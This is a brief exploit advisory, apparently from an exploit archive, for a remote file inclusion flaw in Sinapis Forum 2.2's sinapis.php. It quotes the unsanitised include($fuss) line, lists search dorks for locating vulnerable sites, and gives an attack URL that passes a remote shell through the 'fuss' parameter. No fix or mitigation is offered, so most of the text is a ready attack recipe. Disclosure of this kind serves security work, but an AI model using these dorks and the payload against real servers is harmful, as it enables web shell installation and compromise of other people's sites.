Sinapis Forum version 2.2 suffers from a remote file inclusion vulnerability in sinapis.php.
d4f73e1e7ef3e9c85f034078ce4c2a0767cb0cf4b037222e444097258dd8c1fc
Sinapis Forum 2.2
*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=forum&title=Sinapis%20ForumGstebuch%20<img%20src=/pics/gbscr.gif>
*****************
Dork="Sinapis by scripter.ch"
Dork1="inurl:sinapis.php"
*****************
ERROR:
if($fuss != ""){include($fuss);} <<< rfi coded
**************************************************************************************
RFI:
http://SITE.com/path//sinapis.php?fuss=[SHELL]